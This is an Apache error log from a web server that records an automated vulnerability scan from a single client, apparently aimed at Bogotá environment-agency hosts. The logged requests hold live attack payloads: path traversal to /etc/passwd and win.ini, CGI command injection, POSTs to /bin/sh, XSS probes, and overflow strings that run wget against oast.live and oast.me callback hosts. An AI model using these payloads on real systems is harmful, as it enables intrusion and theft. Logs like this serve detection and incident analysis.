[Thu Jun 02 05:36:42.698649 2022] [cgi:error] [pid 8808:tid 21120] [client 46.101.1.185:42968] script not found or unable to stat: E:/nuevo/cgi-bin/;cat$IFS
[Thu Jun 02 05:36:42.761049 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:42980] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:42.761049 2022] [cgi:error] [pid 8808:tid 20640] [client 46.101.1.185:42982] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:43.073049 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:43046] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:43.088649 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:43048] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:43.197850 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:43066] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:43.213450 2022] [cgi:error] [pid 8808:tid 20560] [client 46.101.1.185:43070] script not found or unable to stat: E:/nuevo/htdocs/free_time_failed.cgi
[Thu Jun 02 05:36:43.307050 2022] [core:error] [pid 8808:tid 21052] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43092] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.key HTTP/1.1 to file
[Thu Jun 02 05:36:43.322650 2022] [negotiation:error] [pid 8808:tid 20552] [client 46.101.1.185:43094] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: portal.ambientebogota.gov.co:80/user/register
[Thu Jun 02 05:36:43.400650 2022] [core:error] [pid 8808:tid 21088] [client 46.101.1.185:43116] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:43.619050 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:43156] AH00135: Invalid method in request info
[Thu Jun 02 05:36:43.634650 2022] [core:error] [pid 8808:tid 20624] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43158] AH00127: Cannot map GET /portal.ambientebogota.gov.co:80.pem HTTP/1.1 to file
[Thu Jun 02 05:36:43.650250 2022] [cgi:error] [pid 8808:tid 20840] [client 46.101.1.185:43176] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:43.712650 2022] [core:error] [pid 8808:tid 20640] [client 46.101.1.185:43184] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:43.712650 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43186] AH00127: Cannot map GET /%20../web-inf/ HTTP/1.1 to file
[Thu Jun 02 05:36:43.806251 2022] [core:error] [pid 8808:tid 21052] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43198] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Thu Jun 02 05:36:43.946651 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:43224] AH00135: Invalid method in request info
[Thu Jun 02 05:36:43.962251 2022] [core:error] [pid 8808:tid 20568] [client 46.101.1.185:43244] AH00126: Invalid URI in request GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:44.024651 2022] [core:error] [pid 8808:tid 21152] [client 46.101.1.185:43250] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:44.055851 2022] [core:error] [pid 8808:tid 20792] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43258] AH00127: Cannot map GET /\\u001B]8;;https://example.com"/onmouseover="alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1 to file
[Thu Jun 02 05:36:44.211851 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:43278] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:44.243051 2022] [core:error] [pid 8808:tid 21180] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43284] AH00127: Cannot map GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1 to file
[Thu Jun 02 05:36:44.258651 2022] [core:error] [pid 8808:tid 20760] [client 46.101.1.185:43286] AH00126: Invalid URI in request GET /static/../../../a/../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:44.289851 2022] [core:error] [pid 8808:tid 21240] [client 46.101.1.185:43304] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:36:44.336652 2022] [core:error] [pid 8808:tid 20852] [client 46.101.1.185:43312] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:44.461452 2022] [cgi:error] [pid 8808:tid 20560] [client 46.101.1.185:43330] script not found or unable to stat: E:/nuevo/cgi-bin/readycloud_control.cgi
[Thu Jun 02 05:36:44.508252 2022] [core:error] [pid 8808:tid 21152] [client 46.101.1.185:43340] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:44.539452 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:43344] AH00127: Cannot map GET /hsqldb%0a HTTP/1.1 to file
[Thu Jun 02 05:36:44.648652 2022] [core:error] [pid 8808:tid 20568] [client 46.101.1.185:43374] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:44.695452 2022] [core:error] [pid 8808:tid 20600] (22)Invalid argument: [client 46.101.1.185:43384] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cac940fad3n9qrnu0kr0ckcjrnayyyynw.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cac940fad3n9qrnu0kr0ckcjrnayyyyns.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Thu Jun 02 05:36:44.960653 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:43438] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:45.007453 2022] [core:error] [pid 8808:tid 20840] (22)Invalid argument: [client 46.101.1.185:43448] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cac940fad3n9qrnu0kr0ckcjrdyyyyynh.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cac940fad3n9qrnu0kr0ckcjrdyyyyyn6.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Thu Jun 02 05:36:45.288253 2022] [core:error] [pid 8808:tid 21088] [client 46.101.1.185:43504] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:45.506654 2022] [core:error] [pid 8808:tid 21024] [client 46.101.1.185:43538] AH00126: Invalid URI in request GET /./../../../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:36:45.553454 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:43558] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:36:45.569054 2022] [negotiation:error] [pid 8808:tid 20600] [client 46.101.1.185:43564] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:45.600254 2022] [core:error] [pid 8808:tid 20808] [client 46.101.1.185:43566] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:45.631454 2022] [cgi:error] [pid 8808:tid 20840] [client 46.101.1.185:43576] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:45.912254 2022] [core:error] [pid 8808:tid 20792] [client 46.101.1.185:43632] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:45.943454 2022] [cgi:error] [pid 8808:tid 21160] [client 46.101.1.185:43642] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:46.224255 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:43698] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:46.536255 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:43762] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:46.848256 2022] [core:error] [pid 8808:tid 21152] [client 46.101.1.185:43826] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:47.082256 2022] [core:error] [pid 8808:tid 20760] (22)Invalid argument: [client 46.101.1.185:43864] AH00127: Cannot map GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:47.129056 2022] [cgi:error] [pid 8808:tid 20852] [client 46.101.1.185:43882] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:47.175857 2022] [core:error] [pid 8808:tid 20808] [client 46.101.1.185:43892] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:47.191457 2022] [negotiation:error] [pid 8808:tid 20792] [client 46.101.1.185:43898] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:47.456657 2022] [cgi:error] [pid 8808:tid 20552] [client 46.101.1.185:43946] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:36:47.456657 2022] [core:error] [pid 8808:tid 20760] [client 46.101.1.185:43950] AH00126: Invalid URI in request GET /../conf/config.properties HTTP/1.1
[Thu Jun 02 05:36:47.487857 2022] [core:error] [pid 8808:tid 21240] [client 46.101.1.185:43956] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:47.643857 2022] [cgi:error] [pid 8808:tid 21240] [client 46.101.1.185:43978] script not found or unable to stat: E:/nuevo/htdocs/appGet.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:47.799858 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:44022] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:48.065058 2022] [cgi:error] [pid 8808:tid 21120] [client 46.101.1.185:44070] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://portal.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:48.111858 2022] [cgi:error] [pid 8808:tid 20792] [client 46.101.1.185:44082] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:48.111858 2022] [core:error] [pid 8808:tid 20708] [client 46.101.1.185:44084] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:48.111858 2022] [authz_core:error] [pid 8808:tid 20932] [client 46.101.1.185:44086] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/
[Thu Jun 02 05:36:48.392659 2022] [core:error] [pid 8808:tid 20848] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:44132] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:48.392659 2022] [cgi:error] [pid 8808:tid 20640] [client 46.101.1.185:44134] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://portal.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:48.423859 2022] [cgi:error] [pid 8808:tid 21024] [client 46.101.1.185:44144] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:48.423859 2022] [core:error] [pid 8808:tid 21212] [client 46.101.1.185:44146] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:48.673459 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:44184] AH00126: Invalid URI in request GET /./../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:48.704659 2022] [core:error] [pid 8808:tid 20852] [client 46.101.1.185:44198] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:48.735859 2022] [core:error] [pid 8808:tid 20616] [client 46.101.1.185:44208] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:48.954260 2022] [cgi:error] [pid 8808:tid 21024] [client 46.101.1.185:44236] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:49.016660 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:44260] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:49.016660 2022] [core:error] [pid 8808:tid 20848] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:44258] AH00127: Cannot map GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:49.047860 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:44262] AH00126: Invalid URI in request GET /../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:36:49.219460 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:44294] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:49.328660 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:44322] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:49.656261 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:44386] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:49.687461 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:44400] AH00127: Cannot map GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1 to file
[Thu Jun 02 05:36:49.968261 2022] [core:error] [pid 8808:tid 20848] [client 46.101.1.185:44446] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:50.249062 2022] [core:error] [pid 8808:tid 20760] (22)Invalid argument: [client 46.101.1.185:44498] AH00127: Cannot map GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 to file
[Thu Jun 02 05:36:50.280262 2022] [core:error] [pid 8808:tid 21272] [client 46.101.1.185:44510] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:50.358262 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:44530] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Thu Jun 02 05:36:50.592263 2022] [core:error] [pid 8808:tid 20852] [client 46.101.1.185:44574] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:50.623463 2022] [core:error] [pid 8808:tid 20932] [client 46.101.1.185:44582] AH00126: Invalid URI in request GET /img/../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:50.904263 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:44640] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:51.153864 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:44682] script not found or unable to stat: E:/nuevo/cgi-bin/logoff.cgi
[Thu Jun 02 05:36:51.216264 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:44696] script not found or unable to stat: E:/nuevo/htdocs/password_change.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:51.216264 2022] [core:error] [pid 8808:tid 20852] [client 46.101.1.185:44704] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:51.216264 2022] [core:error] [pid 8808:tid 21120] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:44706] AH00127: Cannot map GET /\\u001B]8;;https://example.com"/onmouseover="alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1 to file
[Thu Jun 02 05:36:51.294264 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:44726] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:51.434664 2022] [authz_core:error] [pid 8808:tid 20568] [client 46.101.1.185:44744] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Thu Jun 02 05:36:51.450264 2022] [cgi:error] [pid 8808:tid 20520] [client 46.101.1.185:44748] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Thu Jun 02 05:36:51.528264 2022] [core:error] [pid 8808:tid 21016] [client 46.101.1.185:44770] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:51.575064 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:44786] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:51.621864 2022] [cgi:error] [pid 8808:tid 20520] [client 46.101.1.185:44794] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:51.809065 2022] [negotiation:error] [pid 8808:tid 21024] [client 46.101.1.185:44822] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_METHOD_NOT_ALLOWED.html.var
[Thu Jun 02 05:36:51.824665 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:44824] script not found or unable to stat: E:/nuevo/cgi-bin/operator
[Thu Jun 02 05:36:51.855865 2022] [core:error] [pid 8808:tid 20640] [client 46.101.1.185:44838] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:51.902665 2022] [core:error] [pid 8808:tid 20840] [client 46.101.1.185:44854] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:51.933865 2022] [cgi:error] [pid 8808:tid 20808] [client 46.101.1.185:44862] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi, referer: http://ambientic.ambientebogota.gov.co:80/login_pic.asp
[Thu Jun 02 05:36:52.167865 2022] [core:error] [pid 8808:tid 20760] [client 46.101.1.185:44910] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:52.183465 2022] [core:error] [pid 8808:tid 21280] (22)Invalid argument: [client 46.101.1.185:44918] AH00127: Cannot map GET /%c0 HTTP/1.1 to file
[Thu Jun 02 05:36:52.495466 2022] [core:error] [pid 8808:tid 20552] [client 46.101.1.185:44980] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:52.635866 2022] [cgi:error] [pid 8808:tid 20840] [client 46.101.1.185:45018] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:52.776266 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:45038] script not found or unable to stat: E:/nuevo/htdocs/wgarcmin.cgi
[Thu Jun 02 05:36:52.807466 2022] [core:error] [pid 8808:tid 21280] [client 46.101.1.185:45052] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:52.947867 2022] [cgi:error] [pid 8808:tid 20616] [client 46.101.1.185:45090] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:53.057067 2022] [negotiation:error] [pid 8808:tid 20944] [client 46.101.1.185:45104] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:53.119467 2022] [core:error] [pid 8808:tid 21152] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:45118] AH00127: Cannot map GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1 to file
[Thu Jun 02 05:36:53.337867 2022] [authz_core:error] [pid 8808:tid 20608] [client 46.101.1.185:45170] AH01630: client denied by server configuration: E:/nuevo/htdocs/xampp/phpmyadmin
[Thu Jun 02 05:36:53.369067 2022] [negotiation:error] [pid 8808:tid 21224] [client 46.101.1.185:45178] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:53.478268 2022] [core:error] [pid 8808:tid 21152] [client 46.101.1.185:45212] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:36:53.525068 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:45226] script not found or unable to stat: E:/nuevo/htdocs/password.cgi
[Thu Jun 02 05:36:53.649868 2022] [cgi:error] [pid 8808:tid 20704] [client 46.101.1.185:45242] script not found or unable to stat: E:/nuevo/htdocs/if.cgi
[Thu Jun 02 05:36:53.665468 2022] [core:error] [pid 8808:tid 20592] [client 46.101.1.185:45248] AH00126: Invalid URI in request GET /static/../../../a/../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:53.681068 2022] [negotiation:error] [pid 8808:tid 21024] [client 46.101.1.185:45250] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:53.743468 2022] [cgi:error] [pid 8808:tid 20840] [client 46.101.1.185:45270] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:53.743468 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:45272] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 05:36:53.805868 2022] [cgi:error] [pid 8808:tid 20608] [client 46.101.1.185:45296] script not found or unable to stat: E:/nuevo/cgi-bin/supportInstaller
[Thu Jun 02 05:36:53.961868 2022] [authz_core:error] [pid 8808:tid 21088] [client 46.101.1.185:45324] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/setup/index.php
[Thu Jun 02 05:36:53.993069 2022] [negotiation:error] [pid 8808:tid 20520] [client 46.101.1.185:45330] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:54.305069 2022] [negotiation:error] [pid 8808:tid 20576] [client 46.101.1.185:45408] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:54.492269 2022] [cgi:error] [pid 8808:tid 21212] [client 46.101.1.185:45466] script not found or unable to stat: E:/nuevo/cgi-bin/;cat$IFS
[Thu Jun 02 05:36:54.632670 2022] [negotiation:error] [pid 8808:tid 20808] [client 46.101.1.185:45486] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:54.648270 2022] [cgi:error] [pid 8808:tid 21224] [client 46.101.1.185:45490] script not found or unable to stat: E:/nuevo/cgi-bin/slogin
[Thu Jun 02 05:36:54.695070 2022] [cgi:error] [pid 8808:tid 21152] [client 46.101.1.185:45500] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:54.726270 2022] [core:error] [pid 8808:tid 21052] [client 46.101.1.185:45522] AH00135: Invalid method in request info
[Thu Jun 02 05:36:54.773070 2022] [core:error] [pid 8808:tid 20608] [client 46.101.1.185:45538] AH00135: Invalid method in request info
[Thu Jun 02 05:36:55.007070 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:45582] script not found or unable to stat: E:/nuevo/cgi-bin/system_mgr.cgi
[Thu Jun 02 05:36:55.038270 2022] [core:error] [pid 8808:tid 21052] (22)Invalid argument: [client 46.101.1.185:45600] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cac93o7ad3n9qma8lvegckcjrfoyyyype.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cac93o7ad3n9qma8lvegckcjrfoyyyypk.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Thu Jun 02 05:36:55.350271 2022] [core:error] [pid 8808:tid 20616] (22)Invalid argument: [client 46.101.1.185:45680] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cac93o7ad3n9qma8lvegckcjrfoyyyypq.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://cac93o7ad3n9qma8lvegckcjrfoyyyypo.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Thu Jun 02 05:36:55.381471 2022] [cgi:error] [pid 8808:tid 21024] [client 46.101.1.185:45686] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:36:55.381471 2022] [core:error] [pid 8808:tid 20592] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:45688] AH00127: Cannot map POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 to file
[Thu Jun 02 05:36:55.428271 2022] [cgi:error] [pid 8808:tid 20568] [client 46.101.1.185:45698] script not found or unable to stat: E:/nuevo/cgi-bin/mainfunction.cgi
[Thu Jun 02 05:36:55.646671 2022] [cgi:error] [pid 8808:tid 20708] [client 46.101.1.185:45746] script not found or unable to stat: E:/nuevo/htdocs/login.cgi
[Thu Jun 02 05:36:55.896272 2022] [cgi:error] [pid 8808:tid 20592] [client 46.101.1.185:45804] script not found or unable to stat: E:/nuevo/htdocs/apply.cgi
[Thu Jun 02 05:36:55.989872 2022] [core:error] [pid 8808:tid 21152] [client 46.101.1.185:45830] AH00126: Invalid URI in request GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:56.021072 2022] [cgi:error] [pid 8808:tid 20808] [client 46.101.1.185:45842] script not found or unable to stat: E:/nuevo/cgi-bin/mt
